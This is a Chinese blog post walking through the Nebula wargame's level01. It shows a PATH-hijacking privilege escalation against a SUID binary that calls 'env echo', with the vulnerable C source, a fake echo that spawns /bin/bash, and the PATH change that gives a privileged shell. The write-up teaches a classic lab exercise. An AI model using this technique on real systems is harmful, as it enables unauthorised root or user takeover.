環境變量法提權
阿新 • • 發佈:2019-02-14
oca and nis tgz spa pip ace sspi pipe
有些應用程序使用了system等函數調用了系統命令,但是沒有使用絕對路徑而是使用env命令從環境變量中進行查找,這就可能通過修改環境變量來進行權限提升
看下面的例子,本例來自於nebula:
//flag01.c #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #include <stdio.h> int main(int argc, char **argv, char **envp) { gid_t gid; uid_t uid; gid= getegid(); uid = geteuid(); setresgid(gid, gid, gid); setresuid(uid, uid, uid); system("/usr/bin/env echo and now what?"); }
//編譯後得到flag01程序,這個程序具有suid權限
flag01程序通過env命令執行了echo命令
1、創建自己的echo命令,保存在/tmp目錄下
//echo.c #include <stdlib.h> #include <unistd.h> #include <string.h> #include<sys/types.h> #include <stdio.h> int main(int argc, char **argv, char **envp) { system("/bin/bash"); } level01@nebula:/tmp$ //gcc -o echo echo.c
2、查看下當前的環境變量
level01@nebula:/home/flag01$ env TERM=xterm-256color SHELL=/bin/sh SSH_CLIENT=192.168.109.216 52044 22 OLDPWD=/home SSH_TTY=/dev/pts/0 USER=level01 LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36: MAIL=/var/mail/level01 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games PWD=/home/flag01 LANG=en_US.UTF-8 SHLVL=1 HOME=/home/level01 LANGUAGE=en_US: LOGNAME=level01 SSH_CONNECTION=192.168.109.216 52044 192.168.109.196 22 LESSOPEN=| /usr/bin/lesspipe %s LESSCLOSE=/usr/bin/lesspipe %s %s _=/usr/bin/env level01@nebula:/home/flag01$
運行一下命令將/tmp目錄加入PATH變量的最前面,是的env命令首先執行我們自己的echo命令
level01@nebula:/tmp$ PATH=/tmp:$PATH
3、執行flag01程序,由於flag01程序具有suid位,所以flag01會以自身權限執行/tmp/echo命令。/tmp/echo又以flag01的權限執行了/bin/bash命令
因此我們得到了一個flag01權限的shell
環境變量法提權